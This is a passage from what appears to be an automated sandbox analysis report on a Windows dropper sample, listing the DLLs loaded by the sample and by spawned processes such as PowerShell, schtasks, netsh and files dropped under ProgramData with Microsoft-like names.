Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: mscoree.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: apphelp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: version.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: propsys.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: edputil.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: urlmon.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: iertutil.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: srvcli.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: netutils.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: sspicli.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: wintypes.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: appresolver.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: slc.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: userenv.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: sppc.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: apphelp.dllJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeSection loaded: mscoree.dllJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeSection loaded: apphelp.dllJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeSection loaded: version.dllJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: apphelp.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: version.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: vcruntime140.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: cryptsp.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: rsaenh.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: cryptbase.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: libopenblas.vtyum5mxkvfe4pzzer3l7pno6yb4xff3.gfortran-win32.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: libcrypto-1_1.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: wsock32.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: mfplat.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: mf.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: mfreadwrite.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: dxgi.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: d3d11.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: mfcore.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: powrprof.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: ksuser.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: kernel.appcore.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: mfperfhelper.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: rtworkq.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: umpdc.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: pdh.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: iphlpapi.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: wtsapi32.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: mswsock.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: dnsapi.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
